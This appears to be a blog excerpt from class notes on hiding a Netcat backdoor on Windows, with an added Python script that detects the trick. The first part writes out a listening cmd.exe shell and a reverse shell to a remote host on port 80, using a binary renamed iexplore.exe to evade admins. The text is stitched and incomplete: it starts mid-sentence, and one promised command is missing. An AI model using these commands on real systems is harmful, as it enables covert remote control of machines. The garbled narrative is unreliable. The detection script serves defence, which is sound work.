I had this piece of information, which I came across when the professor was taking the NetCat class. I don’t have the whole article. Here is a piece that explains how a hacker can run the backdoor and also hide it from a not-so-smart network or system admin. It is technical. If you are interested in this type of information, read on.
Netcat Backdoor Victim: nc -L -d -p <port> -t -e cmd.exe
with a lot of activity. Hackers might try a different approach. If they’ve infiltrated a Citrix server, for example, accessed by several users who are surfing the Web, you’d expect to see a lot of Domain Name System (DNS) lookups and Web connections. Running netstat -a -n would reveal a load of outgoing TCP port 80 connections. Instead of having an instance of Netcat listening on the Windows box and waiting for connections, Netcat can pipe the input and output of the cmd.exe program to another Netcat instance listening on a remote box on port 80. On his end, the hacker would run:
From the Windows box, the hacker could cleverly “hide” Netcat again and issue these commands:
move nc.exe C:\Windows\System32\Drivers\q\iexplore.exe
cd Windows\System32\Drivers\q
WINDOWS\System32\DRIVERS\q>iexplore.exe
Cmd line: -d -e cmd.exe originix 80
WINDOWS\System32\DRIVERS\q>
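
A defender-side check for the masquerade described above, as an added example that is not part of the original article: it flags an iexplore.exe image running outside the normal Internet Explorer directories, then corroborates with a cmd.exe child and an outbound port 80 connection owned by the same process. The record fields, PIDs, addresses and the EXPECTED_DIRS baseline are assumptions constructed for the example.

```python
import ntpath

# Assumed baseline: directories where the genuine Internet Explorer binary lives.
EXPECTED_DIRS = {r"c:\program files\internet explorer",
                 r"c:\program files (x86)\internet explorer"}

def find_masquerading_shells(processes, connections):
    """Flag iexplore.exe images outside EXPECTED_DIRS and list corroborating signals."""
    findings = []
    for proc in processes:
        directory, name = ntpath.split(proc["image"].lower())
        if name != "iexplore.exe" or directory in EXPECTED_DIRS:
            continue
        reasons = ["iexplore.exe outside expected directory"]
        # Netcat's -e option makes cmd.exe a child of the renamed binary.
        if any(c["ppid"] == proc["pid"]
               and ntpath.basename(c["image"]).lower() == "cmd.exe"
               for c in processes):
            reasons.append("parent of cmd.exe")
        # The outbound port 80 session belongs to the renamed binary's PID.
        if any(c["pid"] == proc["pid"] and c["remote_port"] == 80
               for c in connections):
            reasons.append("outbound TCP 80")
        findings.append({"pid": proc["pid"], "image": proc["image"],
                         "reasons": reasons})
    return findings

# Constructed sample inventory (not captured from a real host).
SAMPLE_PROCESSES = [
    {"pid": 1200, "ppid": 900, "image": r"C:\Program Files\Internet Explorer\iexplore.exe"},
    {"pid": 4242, "ppid": 3100, "image": r"C:\Windows\System32\Drivers\q\iexplore.exe"},
    {"pid": 4250, "ppid": 4242, "image": r"C:\Windows\System32\cmd.exe"},
    {"pid": 3100, "ppid": 900, "image": r"C:\Windows\System32\cmd.exe"},
]
SAMPLE_CONNECTIONS = [
    {"pid": 1200, "remote_addr": "198.51.100.7", "remote_port": 80},
    {"pid": 4242, "remote_addr": "203.0.113.10", "remote_port": 80},
]

if __name__ == "__main__":
    for f in find_masquerading_shells(SAMPLE_PROCESSES, SAMPLE_CONNECTIONS):
        print(f["pid"], f["image"], "; ".join(f["reasons"]))
```

The check keys on image path and process relationships rather than command-line arguments, because in the session above the options are typed at Netcat's "Cmd line:" prompt and the process is started as a bare iexplore.exe.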